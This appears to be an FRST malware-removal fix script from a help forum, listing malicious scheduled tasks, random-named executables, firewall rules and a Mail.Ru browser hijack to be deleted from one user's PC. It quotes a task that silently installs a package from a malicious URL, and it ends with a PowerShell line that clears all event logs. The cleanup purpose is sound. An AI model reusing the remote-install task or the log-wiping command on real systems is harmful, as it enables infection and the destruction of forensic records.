CloseProcesses:
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Brak pliku
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} =>  -> Brak pliku
ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Brak pliku
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} =>  -> Brak pliku
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> Brak pliku
Task: {68FEAA01-3A47-4E4C-B55A-1685368B3150} - System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => "msiexec" /q /i hxxps://refreshnerer711rb.info/G5UinNOyp5.6zZ <==== UWAGA
Task: {ACACA2F2-8091-4146-B26F-4CA8CA18299D} - System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
Task: {D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\WINDOWS\SysWOW64\Microsoft\Protect\S-1-91-36\RB_1.3.20.90.exe <==== UWAGA
FirewallRules: [{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}] => (Allow) C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}] => (Allow) C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
C:\Program Files (x86)\Common Files\INhrB.exe
C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe
FirewallRules: [{64503A19-D801-4A3B-80ED-4916B76F6D5E}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe Brak pliku
FirewallRules: [{0590994E-2B06-4CFF-89E8-0D5AE7939375}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe Brak pliku
FirewallRules: [TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
FirewallRules: [UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\INhrB.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\joannas\AppData\Local\ieauOreoYaK.exe
2019-03-13 10:09 - 2019-03-13 10:09 - 000000003 _____ () C:\Users\joannas\AppData\Local\wbem.ini
HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.ru/cnt/10445?gp=834423
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {97F86C3D-A5E8-482E-BF0C-5080B7E20233} URL = 
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
BHO-x32: Search@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\joannas\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2019-03-13] (LLC Mail.Ru -> Mail.Ru)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Brak pliku
2019-03-13 10:09 - 2019-03-13 10:22 - 000000000 ____D C:\ProgramData\localNETService
2019-03-13 10:09 - 2019-03-13 10:14 - 000000000 ____D C:\Users\joannas\AppData\Local\Mail.Ru
2019-03-13 10:09 - 2019-03-13 10:09 - 000000000 ____D C:\ProgramData\Mail.Ru
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
S3 mfeavfk04; \Device\mfeavfk04.sys [X]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp: